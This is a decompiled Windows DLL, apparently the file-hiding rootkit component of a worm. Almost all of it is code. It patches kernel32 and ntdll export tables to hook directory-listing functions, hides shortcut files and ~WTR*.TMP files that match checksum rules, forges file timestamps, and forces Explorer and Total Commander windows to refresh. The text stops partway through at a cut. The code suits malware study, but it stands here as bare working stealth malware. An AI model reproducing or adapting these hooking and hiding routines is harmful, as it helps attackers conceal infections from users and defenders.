/* This file has been generated by the Hex-Rays decompiler. Copyright (c) 2009 Hex-Rays Detected compiler: Visual C++ */ #include #include //------------------------------------------------------------------------- // Data declarations extern int dword_100037B0[8]; // weak extern char *off_100037D2; // weak extern char byte_100037D9[3]; // weak extern char byte_100038A7; // weak extern int dword_10003C3A; // weak extern int dword_10003C42; // weak extern int dword_10003C46; // weak extern int dword_10003C4A; // weak extern int dword_10003C4E; // weak extern int dword_10003C52; // weak extern int (__stdcall *dword_10003C56)(_DWORD); // weak extern int dword_10003C5A; // weak extern int dword_10003C5E; // weak extern int dword_10003C62; // weak extern int (__stdcall *dword_10003C66)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); // weak extern int (__stdcall *dword_10003C6A)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); // weak extern int dword_10003C6E; // weak extern int dword_10003C72; // weak extern int dword_10003C76; // weak extern int (__stdcall *dword_10003C7A)(_DWORD); // weak extern _UNKNOWN unk_100050E0; // weak extern _UNKNOWN unk_10005110; // weak extern _UNKNOWN unk_10005124; // weak extern _UNKNOWN unk_10005140; // weak extern _UNKNOWN unk_10005160; // weak extern _UNKNOWN unk_10005180; // weak extern _UNKNOWN unk_1000519C; // weak extern _UNKNOWN unk_100051BC; // weak extern _UNKNOWN unk_100051E8; // weak extern _UNKNOWN unk_10005204; // weak extern _UNKNOWN unk_1000521C; // weak extern _UNKNOWN unk_1000523C; // weak extern _UNKNOWN unk_10005264; // weak extern _UNKNOWN unk_10005280; // weak extern _UNKNOWN unk_100052A8; // weak extern _UNKNOWN unk_100052CC; // weak extern _UNKNOWN unk_10005328; // weak extern _UNKNOWN unk_10005344; // weak extern char ProcName[]; // idb extern const WCHAR ModuleName[]; // idb extern wchar_t a_lnk[5]; // weak extern wchar_t a_tmp[5]; // weak extern wchar_t aWtr[5]; // weak extern char aFindfirstfilew[15]; // weak extern char aKernel32_dll_0[13]; // weak extern char aFindnextfilew[14]; // weak extern char aFindfirstfilee[17]; // weak extern char aNtquerydirecto[21]; // weak extern char aNtdll_dll_0[10]; // weak extern char aZwquerydirecto[21]; // weak extern const WCHAR word_10005428; // idb extern const WCHAR String2[]; // idb extern const WCHAR aWincmd_exe[]; // idb extern const WCHAR aProgman[]; // idb extern const WCHAR aSyslistview32[]; // idb extern const WCHAR aDirectuihwnd[]; // idb extern const WCHAR String[]; // idb extern wchar_t aShell32_dll_as[18]; // weak extern const WCHAR aS08x[]; // idb extern const WCHAR a08x08x08x08x[]; // idb extern const WCHAR Name[]; // idb extern const WCHAR aCopyOf[]; // idb extern const WCHAR aCopyOfShortcut[]; // idb extern const WCHAR aWtr4141_tmp[]; // idb extern _UNKNOWN unk_100055D8; // weak extern _UNKNOWN unk_100055E8; // weak extern _UNKNOWN unk_100055F8; // weak extern _UNKNOWN unk_10005608; // weak extern _UNKNOWN unk_10005618; // weak extern _DWORD dword_10006000[4]; // idb extern int dword_10006010; // weak extern int dword_10006020; // weak extern int dword_10006028; // weak extern _DWORD dword_1000602C; // idb extern _UNKNOWN unk_10006030; // weak extern int dword_10006038; // weak extern int dword_1000603C; // weak extern int dword_10006040[]; // weak extern int dword_10006044; // weak extern int dword_10006048; // weak extern int (__stdcall *dword_10006178)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); // weak extern int (__stdcall *dword_1000617C)(_DWORD, _DWORD); // weak extern int (__stdcall *dword_10006180)(_DWORD, _DWORD); // weak extern int (__stdcall *dword_10006184)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); // weak extern int dword_10006188; // weak extern HMODULE hModule; // idb //------------------------------------------------------------------------- // Function declarations #define __thiscall __cdecl // Test compile in C mode // BOOL __userpurge sub_10001000(int a1, int a2, int a3, void *a4); // char __userpurge sub_10001090(int a1, unsigned int a2, int a3, int a4, int a5); // char __userpurge sub_10001230(signed int a1, int a2, unsigned int a3, int a4); // char __userpurge sub_100012A0(int a1, int a2, unsigned int a3, int a4); // char __usercall sub_10001340(int a1, int a2, int a3); // char __usercall sub_10001390(int a1, int a2, int a3, int a4); BOOL __cdecl sub_10001430(); int __stdcall sub_100014C0(int a1, int a2, int a3, int a4, int a5, unsigned int a6, int a7, int a8, int a9, int a10, int a11); signed int __stdcall sub_10001580(int a1, int a2); signed int __stdcall sub_10001600(int a1, int a2); int __stdcall sub_10001700(int a1, int a2, int a3, int a4, int a5, int a6); BOOL __cdecl sub_10001790(); signed int __stdcall EnumFunc(HWND hWnd, int a2); // __int32 __userpurge sub_10001850(__int32 result, int a2); signed int __stdcall sub_100018F0(HWND a1, int a2); // void *__usercall sub_10001910(HWND a1); // HMODULE __userpurge sub_100019A0(const CHAR *a1, DWORD a2, int a3, int a4); // BOOL __userpurge sub_10001A50(int a1, LPCSTR flOldProtect, int a3); // signed int __userpurge sub_10001B20(int a1, DWORD lpString1, LPCSTR lpString2, int a4); // signed int __userpurge sub_10001C40(DWORD a1, int a2, LPCSTR lpString1, LPCSTR lpString2, int a5); // WCHAR *__usercall sub_10001D00(const WCHAR *a1); // signed int __usercall sub_10001D90(const WCHAR *a1, DWORD a2, LPVOID *a3, DWORD *a4); BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved); signed int __cdecl sub_10001EA7(); // int __userpurge sub_10001EAD(int a1, int a2, int a3, int a4); DWORD __cdecl sub_10001ED0(); // signed int __usercall sub_10001F80(const WCHAR *a1); bool __stdcall sub_10001FD0(LPCWSTR lpFileName, int a2); HANDLE __cdecl sub_100020A0(); HANDLE __cdecl sub_10002130(); HRESULT __stdcall DllGetClassObject(const IID *const rclsid, const IID *const riid, LPVOID *ppv); // int __userpurge StartAddress(int a1, LPCWSTR lpFileName); // void __usercall sub_10002340(LPCWSTR lpFileName, int a2); void __stdcall sub_100023D0(LPCWSTR lpFileName); // bool __userpurge sub_10002460(int a1, LPCWSTR lpFileName); // bool __userpurge sub_100024B0(DWORD a1, DWORD a2, void *a3, const void *a4); bool __thiscall sub_100024F0(void *this); // void __usercall sub_100025B0(const WCHAR *a1); int __cdecl sub_100027B0(int a1); int __cdecl loc_100027C8(int); // weak signed int __cdecl sub_100027D0(int a1, int a2, int a3, int a4); // int __usercall sub_100027F2(int a1, int a2, int a3); // int __userpurge sub_10002886(int result, int a2, int a3); // signed int __usercall sub_100028A8(int a1); void *__cdecl sub_10002D70(void *a1, unsigned __int8 a2, unsigned int a3); // DWORD __stdcall GetModuleBaseNameW(HANDLE hProcess, HMODULE hModule, LPWSTR lpBaseName, DWORD nSize); // BOOL __stdcall EnumProcessModules(HANDLE hProcess, HMODULE *lphModule, DWORD cb, LPDWORD lpcbNeeded); signed int __thiscall sub_10002DD4(DWORD this); signed int __cdecl sub_10002F0F(int a1, int a2, int a3, int a4, int a5); int __cdecl sub_10002FBF(void **a1, int a2, int a3, int a4, const void *a5, unsigned int a6); int __cdecl sub_1000300D(int, LPCWSTR lpString2); // idb int __cdecl sub_100030C2(int a1, const void *a2, const void *a3, unsigned int a4, int a5, const void *a6, unsigned int a7, int a8); signed int __cdecl sub_1000320E(int a1, int a2, const void *a3); unsigned int __cdecl sub_10003327(); signed int (__cdecl *__cdecl sub_10003336())(int); unsigned int __cdecl sub_10003340(); unsigned int __cdecl sub_1000334F(); int __cdecl sub_1000335E(int a1, int a2, int a3, int a4); int __cdecl sub_100034D2(LPCWSTR lpString2, const void *a2, unsigned int a3, int a4); int __cdecl sub_100035ED(LPCWSTR lpFileName, HANDLE hObject, int); // idb int __cdecl sub_1000368F(LPVOID lpAddress); // idb int __cdecl sub_100036A8(int a1, int a2); __int16 __cdecl sub_100036CB(int a1, int a2); HMODULE __cdecl sub_10003708(); FARPROC __cdecl sub_10003733(int a1, int a2); void __cdecl sub_10003774(void *a1, const void *a2, unsigned int a3); FARPROC __cdecl sub_10003788(int a1); FARPROC __cdecl sub_10003799(int a1); void __fastcall sub_10003ACF(int a1, int a2); void __cdecl sub_10003B11(); // int __usercall sub_10003B64(int a1, int a2, int a3); // int __stdcall RtlUnwind(_DWORD, _DWORD, _DWORD, _DWORD); weak signed int __cdecl sub_10003C84(int a1); int __stdcall sub_10003E22(int a1); int __cdecl sub_10003E95(int a1, int a2, int a3); signed int __stdcall sub_10003F58(int a1); void __cdecl sub_100040B7(void *a1, const void *a2, unsigned int a3); int __cdecl sub_100040CB(const void *a1, int a2, void *a3); signed int __cdecl sub_1000414D(int a1, int a2); signed int __cdecl sub_100041EB(int a1, int a2, const void *a3, int a4); void __cdecl sub_100042CC(); // DWORD __stdcall GetFileSize(HANDLE hFile, LPDWORD lpFileSizeHigh); // BOOL __stdcall GetFileAttributesExW(LPCWSTR lpFileName, GET_FILEEX_INFO_LEVELS fInfoLevelId, LPVOID lpFileInformation); // HMODULE __stdcall GetModuleHandleW(LPCWSTR lpModuleName); // BOOL __stdcall SetFileTime(HANDLE hFile, const FILETIME *lpCreationTime, const FILETIME *lpLastAccessTime, const FILETIME *lpLastWriteTime); // BOOL __stdcall WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped); // DWORD __stdcall GetFileAttributesW(LPCWSTR lpFileName); // HANDLE __stdcall CreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); // int __stdcall lstrlenW(LPCWSTR lpString); // FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName); // BOOL __stdcall CloseHandle(HANDLE hObject); // BOOL __stdcall DeleteFileW(LPCWSTR lpFileName); // LPWSTR __stdcall lstrcpyW(LPWSTR lpString1, LPCWSTR lpString2); // BOOL __stdcall SetFileAttributesW(LPCWSTR lpFileName, DWORD dwFileAttributes); // HANDLE __stdcall GetCurrentProcess(); // void __stdcall SetLastError(DWORD dwErrCode); // int __stdcall lstrcmpiW(LPCWSTR lpString1, LPCWSTR lpString2); // DWORD __stdcall GetCurrentThreadId(); // DWORD __stdcall GetCurrentProcessId(); // int __stdcall lstrcmpA(LPCSTR lpString1, LPCSTR lpString2); // BOOL __stdcall IsBadReadPtr(const void *lp, UINT_PTR ucb); // DWORD __stdcall GetModuleFileNameW(HMODULE hModule, LPWCH lpFilename, DWORD nSize); // int __stdcall lstrcmpiA(LPCSTR lpString1, LPCSTR lpString2); // HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName); // BOOL __stdcall VirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect); // LPWSTR __stdcall lstrcatW(LPWSTR lpString1, LPCWSTR lpString2); // BOOL __stdcall VirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType); // LPWSTR __stdcall lstrcpynW(LPWSTR lpString1, LPCWSTR lpString2, int iMaxLength); // BOOL __stdcall ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped); // LPVOID __stdcall VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); // HANDLE __stdcall CreateMutexW(LPSECURITY_ATTRIBUTES lpMutexAttributes, BOOL bInitialOwner, LPCWSTR lpName); // UINT __stdcall SetErrorMode(UINT uMode); // BOOL __stdcall FreeLibrary(HMODULE hLibModule); // LPVOID __stdcall HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); // DWORD __stdcall WaitForSingleObject(HANDLE hHandle, DWORD dwMilliseconds); // DWORD __stdcall GetTickCount(); // HANDLE __stdcall GetProcessHeap(); // void __stdcall Sleep(DWORD dwMilliseconds); // DWORD __stdcall GetLastError(); // BOOL __stdcall DisableThreadLibraryCalls(HMODULE hLibModule); // BOOL __stdcall ReleaseMutex(HANDLE hMutex); // HANDLE __stdcall CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId); // DWORD __stdcall SetFilePointer(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod); // DWORD __stdcall GetWindowThreadProcessId(HWND hWnd, LPDWORD lpdwProcessId); // LRESULT __stdcall SendMessageW(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam); // BOOL __stdcall IsWindowVisible(HWND hWnd); // BOOL __stdcall EnumChildWindows(HWND hWndParent, WNDENUMPROC lpEnumFunc, LPARAM lParam); // int __stdcall GetClassNameW(HWND hWnd, LPWSTR lpClassName, int nMaxCount); // BOOL __stdcall EnumWindows(WNDENUMPROC lpEnumFunc, LPARAM lParam); // BOOL __stdcall PostMessageW(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam); // int wsprintfW(LPWSTR, LPCWSTR, ...); //----- (10001000) -------------------------------------------------------- BOOL __userpurge sub_10001000(int a1, int a2, int a3, void *a4) { FARPROC v4; // eax@1 HMODULE v5; // eax@1 BOOL result; // eax@2 int v7; // edx@2 int v8; // ecx@2 int v9; // edx@2 int v10; // ecx@2 int v11; // edx@2 char v12; // [sp+0h] [bp-30h]@2 int v13; // [sp+8h] [bp-28h]@2 int v14; // [sp+Ch] [bp-24h]@2 int v15; // [sp+10h] [bp-20h]@2 int v16; // [sp+14h] [bp-1Ch]@2 int v17; // [sp+18h] [bp-18h]@2 int v18; // [sp+1Ch] [bp-14h]@2 int v19; // [sp+20h] [bp-10h]@2 int v20; // [sp+24h] [bp-Ch]@2 int v21; // [sp+28h] [bp-8h]@2 v5 = GetModuleHandleW(L"NTDLL.DLL"); v4 = GetProcAddress(v5, "ZwSetInformationFile"); if ( !v4 || (v7 = *(_DWORD *)(a1 + 4), v13 = *(_DWORD *)a1, v8 = *(_DWORD *)a2, v14 = v7, v9 = *(_DWORD *)(a2 + 4), v15 = v8, v10 = *(_DWORD *)a3, v16 = v9, v11 = *(_DWORD *)(a3 + 4), v17 = v10, v19 = v10, v18 = v11, v20 = v11, v21 = 128, (result = ((int (__stdcall *)(void *, char *, int *, signed int, signed int))v4)(a4, &v12, &v13, 40, 4)) != 0) ) result = SetFileTime(a4, (const FILETIME *)a1, (const FILETIME *)a2, (const FILETIME *)a3); return result; } //----- (10001090) -------------------------------------------------------- char __userpurge sub_10001090(int a1, unsigned int a2, int a3, int a4, int a5) { unsigned int v5; // ebp@1 int v7; // ebx@3 signed int v8; // eax@6 signed int v9; // edi@7 signed int v10; // eax@11 int v11; // ecx@11 int v12; // esi@13 int v13; // edx@15 int v14; // eax@22 int v15; // ecx@22 int v16; // edx@23 int v17; // ecx@24 int v18; // esi@24 int v19; // [sp+18h] [bp-14h]@1 unsigned int v20; // [sp+1Ch] [bp-10h]@1 unsigned int v21; // [sp+24h] [bp-8h]@4 int v22; // [sp+28h] [bp-4h]@4 char v23; // [sp+30h] [bp+4h]@1 v5 = a2; v19 = a1; v23 = 0; v20 = 0; if ( !a1 ) return 1; while ( 1 ) { v7 = *(_DWORD *)v5; if ( a3 == -1 ) { v21 = -1; v22 = -1; } else { v21 = *(_DWORD *)(a3 + v5); v22 = *(_DWORD *)(v5 + 4 + a3); } v8 = *(_DWORD *)(a5 + v5); if ( !(v8 & 1) ) { v9 = v8 / 2; if ( ((v22 & v21) == -1 || !v22 && v21 == 4171) && v9 > 4 ) { v11 = (int)L".LNK"; v10 = 4; while ( v10 ) { v12 = *(_WORD *)v11; if ( (unsigned int)(v12 - 97) <= 0x19 ) v12 -= 32; v13 = *(_WORD *)(a4 + v5 + 2 * v9 - 8 - (_DWORD)L".LNK" + v11); if ( (unsigned int)(v13 - 97) <= 0x19 ) v13 -= 32; v7 = *(_DWORD *)v5; if ( v12 != v13 ) break; v11 += 2; --v10; if ( !*(_WORD *)v11 ) goto LABEL_21; } } if ( sub_100012A0(a4 + v5, v9, v21, v22) ) break; } v20 = v5; v23 = 1; v5 += v7; LABEL_31: v19 -= v7; if ( !v7 ) return v23 != 0; } LABEL_21: if ( v7 ) { v15 = v7 + v5; v14 = v19 - v7; if ( v5 <= v7 + v5 || (v16 = v14 + v15, v5 >= v14 + v15) ) { if ( v19 != v7 ) { do { --v14; *(_BYTE *)(v15 - v7) = *(_BYTE *)v15; ++v15; } while ( v14 ); } } else { v17 = v5 - 1 + v14; v18 = v16 - 1; if ( v19 != v7 ) { do { --v14; *(_BYTE *)v17-- = *(_BYTE *)v18--; } while ( v14 ); } } goto LABEL_31; } if ( v20 ) *(_DWORD *)v20 = 0; return v23 != 0; } // 10005384: using guessed type wchar_t a_lnk[5]; //----- (10001230) -------------------------------------------------------- char __userpurge sub_10001230(signed int a1, int a2, unsigned int a3, int a4) { int v4; // edi@1 char result; // al@2 signed int v6; // esi@3 v4 = a2; if ( a1 & 1 ) { result = 0; } else { v6 = a1 / 2; if ( (a4 & a3) != -1 && (a4 || a3 != 4171) || v6 <= 4 || !sub_10001340(4, a2 + 2 * v6 - 8, (int)L".LNK") ) result = sub_100012A0(v4, v6, a3, a4) != 0; else result = 1; } return result; } // 10005384: using guessed type wchar_t a_lnk[5]; //----- (100012A0) -------------------------------------------------------- char __userpurge sub_100012A0(int a1, int a2, unsigned int a3, int a4) { int v4; // esi@1 signed int v6; // ecx@9 unsigned __int16 v7; // ax@10 v4 = 0; if ( ((a4 & a3) == -1 || !a4 && a3 >= 0x1000 && a3 <= 0x800000) && a2 == 12 && sub_10001340(4, a1 + 16, (int)L".TMP") && sub_10001340(12, a1, (int)L"~WTR") ) { v6 = 4; while ( 1 ) { v7 = *(_WORD *)(a1 + 2 * v6); if ( v7 < 0x30u ) break; if ( v7 > 0x39u ) break; ++v6; v4 = (v7 + v4 - 48) % 10; if ( v6 > 7 ) return v4 == 0; } } return 0; } // 10005390: using guessed type wchar_t a_tmp[5]; // 1000539C: using guessed type wchar_t aWtr[5]; //----- (10001340) -------------------------------------------------------- char __usercall sub_10001340(int a1, int a2, int a3) { unsigned __int16 v3; // ax@1 int v4; // edi@1 int v5; // esi@1 int v6; // edx@3 int v7; // eax@5 char result; // al@9 v4 = a1; v3 = *(_WORD *)a3; v5 = a2; if ( *(_WORD *)a3 ) { while ( v4 ) { v6 = v3; if ( (unsigned int)v3 - 97 <= 0x19 ) v6 = v3 - 32; v7 = *(_WORD *)v5; if ( (unsigned int)(v7 - 97) <= 0x19 ) v7 -= 32; if ( v6 != v7 ) break; v3 = *(_WORD *)(a3 + 2); a3 += 2; v5 += 2; --v4; if ( !v3 ) goto LABEL_9; } result = 0; } else { LABEL_9: result = 1; } return result; } //----- (10001390) -------------------------------------------------------- char __usercall sub_10001390(int a1, int a2, int a3, int a4) { char result; // al@2 switch ( a4 ) { case 3: *(_DWORD *)a1 = 60; *(_DWORD *)a2 = 40; *(_DWORD *)a3 = 94; result = 1; break; case 1: *(_DWORD *)a1 = 60; *(_DWORD *)a2 = 40; *(_DWORD *)a3 = 64; result = 1; break; case 2: *(_DWORD *)a1 = 60; *(_DWORD *)a2 = 40; *(_DWORD *)a3 = 68; result = 1; break; case 37: *(_DWORD *)a1 = 60; *(_DWORD *)a2 = 40; *(_DWORD *)a3 = 104; result = 1; break; case 38: *(_DWORD *)a1 = 60; *(_DWORD *)a2 = 40; *(_DWORD *)a3 = 80; result = 1; break; case 12: *(_DWORD *)a1 = 8; *(_DWORD *)a2 = -1; *(_DWORD *)a3 = 12; result = 1; break; default: result = 0; break; } return result; } //----- (10001430) -------------------------------------------------------- BOOL __cdecl sub_10001430() { sub_100019A0("FindFirstFileW", (DWORD)"KERNEL32.DLL", (int)sub_10001580, (int)&dword_1000617C); sub_100019A0("FindNextFileW", (DWORD)"KERNEL32.DLL", (int)sub_10001600, (int)&dword_10006180); sub_100019A0("FindFirstFileExW", (DWORD)"KERNEL32.DLL", (int)sub_10001700, (int)&dword_10006184); sub_100019A0("NtQueryDirectoryFile", (DWORD)"NTDLL.DLL", (int)sub_100014C0, (int)&dword_10006178); sub_100019A0("ZwQueryDirectoryFile", (DWORD)"NTDLL.DLL", (int)sub_100014C0, (int)&dword_10006178); return sub_10001790(); } // 10006178: using guessed type int (__stdcall *dword_10006178)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); // 1000617C: using guessed type int (__stdcall *dword_1000617C)(_DWORD, _DWORD); // 10006180: using guessed type int (__stdcall *dword_10006180)(_DWORD, _DWORD); // 10006184: using guessed type int (__stdcall *dword_10006184)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); //----- (100014C0) -------------------------------------------------------- int __stdcall sub_100014C0(int a1, int a2, int a3, int a4, int a5, unsigned int a6, int a7, int a8, int a9, int a10, int a11) { int result; // eax@2 unsigned __int8 v12; // sf@8 unsigned __int8 v13; // of@8 int v14; // [sp+2Ch] [bp-10h]@3 int v15; // [sp+30h] [bp-Ch]@6 int v16; // [sp+34h] [bp-8h]@6 int v17; // [sp+38h] [bp-4h]@6 if ( dword_10006178 ) { v14 = 0; while ( 1 ) { result = dword_10006178(a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11); if ( result ) break; if ( !a6 ) break; if ( !sub_10001390((int)&v15, (int)&v17, (int)&v16, a8) || sub_10001090(a7, a6, v17, v16, v15) ) return 0; LOBYTE(a11) = 0; v13 = __SETO__(v14 + 1, 10); v12 = v14++ - 9 < 0; if ( !(v12 ^ v13) ) return -1073741809; } } else { result = -1073741801; } return result; } // 10006178: using guessed type int (__stdcall *dword_10006178)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); //----- (10001580) -------------------------------------------------------- signed int __stdcall sub_10001580(int a1, int a2) { int v2; // ebx@2 int v3; // ST08_4@3 unsigned int v4; // ST04_4@3 int v5; // eax@3 if ( !dword_1000617C || (v2 = dword_1000617C(a1, a2), v2 == -1) ) return -1; v3 = *(_DWORD *)(a2 + 28); v4 = *(_DWORD *)(a2 + 32); v5 = lstrlenW((LPCWSTR)(a2 + 44)); if ( sub_10001230(2 * v5, a2 + 44, v4, v3) && !sub_10001600(v2, a2) ) { SetLastError(2u); CloseHandle((HANDLE)v2); return -1; } return v2; } // 1000617C: using guessed type int (__stdcall *dword_1000617C)(_DWORD, _DWORD); //----- (10001600) -------------------------------------------------------- signed int __stdcall sub_10001600(int a1, int a2) { int v3; // esi@3 signed int v4; // eax@5 signed int v5; // edi@6 signed int v6; // eax@10 int v7; // ecx@10 int v8; // esi@12 int v9; // edx@14 char v10; // zf@16 int v11; // [sp+Ch] [bp-Ch]@10 unsigned int v12; // [sp+10h] [bp-8h]@5 int v13; // [sp+14h] [bp-4h]@5 if ( dword_10006180 ) { v3 = a2; LABEL_4: while ( dword_10006180(a1, v3) ) { v12 = *(_DWORD *)(v3 + 32); v13 = *(_DWORD *)(v3 + 28); v4 = 2 * lstrlenW((LPCWSTR)(v3 + 44)); if ( !(v4 & 1) ) { v5 = v4 / 2; if ( ((v13 & v12) == -1 || !v13 && v12 == 4171) && v5 > 4 ) { v7 = (int)L".LNK"; v6 = 4; v11 = v3 + 44 + 2 * v5 - 8 - (_DWORD)L".LNK"; while ( v6 ) { v8 = *(_WORD *)v7; if ( (unsigned int)(v8 - 97) <= 0x19 ) v8 -= 32; v9 = *(_WORD *)(v11 + v7); if ( (unsigned int)(v9 - 97) <= 0x19 ) v9 -= 32; v10 = v8 == v9; v3 = a2; if ( !v10 ) break; v7 += 2; --v6; if ( !*(_WORD *)v7 ) goto LABEL_4; } } if ( sub_100012A0(v3 + 44, v5, v12, v13) ) continue; } return 1; } } return 0; } // 10005384: using guessed type wchar_t a_lnk[5]; // 10006180: using guessed type int (__stdcall *dword_10006180)(_DWORD, _DWORD); //----- (10001700) -------------------------------------------------------- int __stdcall sub_10001700(int a1, int a2, int a3, int a4, int a5, int a6) { int result; // eax@2 int v7; // edi@2 int v8; // ST14_4@4 unsigned int v9; // ST10_4@4 int v10; // eax@4 if ( !dword_10006184 || (result = dword_10006184(a1, a2, a3, a4, a5, a6), v7 = result, result == -1) ) return -1; if ( a2 ) return result; v8 = *(_DWORD *)(a3 + 28); v9 = *(_DWORD *)(a3 + 32); v10 = lstrlenW((LPCWSTR)(a3 + 44)); if ( sub_10001230(2 * v10, a3 + 44, v9, v8) && !sub_10001600(v7, a3) ) { SetLastError(2u); CloseHandle((HANDLE)v7); return -1; } return v7; } // 10006184: using guessed type int (__stdcall *dword_10006184)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); //----- (10001790) -------------------------------------------------------- BOOL __cdecl sub_10001790() { LPARAM v0; // esi@1 HANDLE v1; // eax@1 WCHAR String1; // [sp+8h] [bp-208h]@1 char v4; // [sp+Ah] [bp-206h]@1 String1 = 0; sub_10002D70(&v4, 0, 0x206u); v0 = 0; v1 = GetCurrentProcess(); GetModuleBaseNameW(v1, 0, &String1, 0x104u); if ( !lstrcmpiW(&String1, L"totalcmd.exe") || !lstrcmpiW(&String1, L"wincmd.exe") ) v0 = 1; return EnumWindows((WNDENUMPROC)EnumFunc, v0); } //----- (10001810) -------------------------------------------------------- signed int __stdcall EnumFunc(HWND hWnd, int a2) { DWORD dwProcessId; // [sp+0h] [bp-4h]@1 dwProcessId = 0; GetWindowThreadProcessId(hWnd, &dwProcessId); if ( dwProcessId == GetCurrentProcessId() ) sub_10001850((__int32)hWnd, a2); return 1; } //----- (10001850) -------------------------------------------------------- __int32 __userpurge sub_10001850(__int32 result, int a2) { LPARAM v2; // esi@1 DWORD v3; // eax@6 DWORD v4; // eax@6 WCHAR String1; // [sp+4h] [bp-208h]@4 v2 = result; if ( result ) { result = IsWindowVisible((HWND)result); if ( result ) { if ( a2 ) { v3 = GetCurrentThreadId(); SendMessageW((HWND)v2, 28u, 0, v3); v4 = GetCurrentThreadId(); SendMessageW((HWND)v2, 0x1Cu, 1u, v4); result = SendMessageW((HWND)v2, 6u, 2u, v2); } else { GetClassNameW((HWND)v2, &String1, 260); result = lstrcmpiW(&String1, L"Progman"); if ( result ) { sub_10001910((HWND)v2); result = EnumChildWindows((HWND)v2, (WNDENUMPROC)sub_100018F0, 0); } } } } return result; } //----- (100018F0) -------------------------------------------------------- signed int __stdcall sub_100018F0(HWND a1, int a2) { sub_10001910(a1); return 1; } //----- (10001910) -------------------------------------------------------- void *__usercall sub_10001910(HWND a1) { void *result; // eax@1 WCHAR String1; // [sp+0h] [bp-208h]@1 char v3; // [sp+2h] [bp-206h]@1 String1 = 0; result = sub_10002D70(&v3, 0, 0x206u); if ( a1 ) { result = (void *)IsWindowVisible(a1); if ( result ) { GetClassNameW(a1, &String1, 260); if ( !lstrcmpiW(&String1, L"SysListView32") || (result = (void *)lstrcmpiW(&String1, L"DirectUIHWND"), !result) ) { PostMessageW(a1, 256u, 116u, 0); result = (void *)PostMessageW(a1, 0x101u, 0x74u, 0); } } } return result; } //----- (100019A0) -------------------------------------------------------- HMODULE __userpurge sub_100019A0(const CHAR *a1, DWORD a2, int a3, int a4) { HMODULE result; // eax@2 int v5; // esi@3 FARPROC v6; // eax@5 int v7; // ebx@5 int v8; // eax@8 int v9; // ecx@8 int v10; // eax@8 if ( dword_10006188 < 16 ) { result = GetModuleHandleA((LPCSTR)a2); v5 = (int)result; if ( result ) { v6 = GetProcAddress(result, a1); v7 = (int)v6; if ( v6 && v6 != (FARPROC)a3 ) { v8 = sub_10001A50(v5, a1, a3); sub_10001B20(v8, a2, a1, a3); v9 = dword_10006188; v10 = 20 * dword_10006188; dword_10006040[5 * dword_10006188] = v5; *(int *)((char *)&dword_10006048 + v10) = a3; *(int *)((char *)&dword_10006044 + v10) = v7; *(int *)((char *)&dword_10006038 + v10) = a2; *(int *)((char *)&dword_1000603C + v10) = (int)a1; *(_DWORD *)a4 = v7; dword_10006188 = v9 + 1; result = (HMODULE)1; } else { result = 0; } } } else { result = 0; } return result; } // 10006038: using guessed type int dword_10006038; // 1000603C: using guessed type int dword_1000603C; // 10006040: using guessed type int dword_10006040[]; // 10006044: using guessed type int dword_10006044; // 10006048: using guessed type int dword_10006048; // 10006188: using guessed type int dword_10006188; //----- (10001A50) -------------------------------------------------------- BOOL __userpurge sub_10001A50(int a1, LPCSTR flOldProtect, int a3) { BOOL result; // eax@2 int v4; // eax@3 int v5; // ebx@4 unsigned int v6; // ebp@4 int v7; // edi@6 void *v8; // edi@9 int v9; // [sp+0h] [bp-Ch]@5 unsigned int v10; // [sp+4h] [bp-8h]@4 int v11; // [sp+8h] [bp-4h]@4 if ( *(_WORD *)a1 != 23117 || (v4 = *(_DWORD *)(*(_DWORD *)(a1 + 60) + a1 + 120), !v4) ) return 0; v11 = a1 + *(_DWORD *)(v4 + a1 + 28); v5 = a1 + *(_DWORD *)(v4 + a1 + 32); v6 = 0; v10 = *(_DWORD *)(v4 + a1 + 24); if ( !v10 ) goto LABEL_12; v9 = v4 + a1 + 36; while ( 1 ) { v7 = a1 + *(_DWORD *)v9; if ( !lstrcmpA((LPCSTR)(a1 + *(_DWORD *)v5), flOldProtect) ) break; ++v6; v5 += 4; if ( v6 >= v10 ) return 1; } v8 = (void *)(v11 + 4 * *(_WORD *)(v7 + 2 * v6)); result = VirtualProtect(v8, 4u, 0x80u, (PDWORD)&flOldProtect); if ( result ) { *(_DWORD *)v8 = a3 - a1; LABEL_12: result = 1; } return result; } //----- 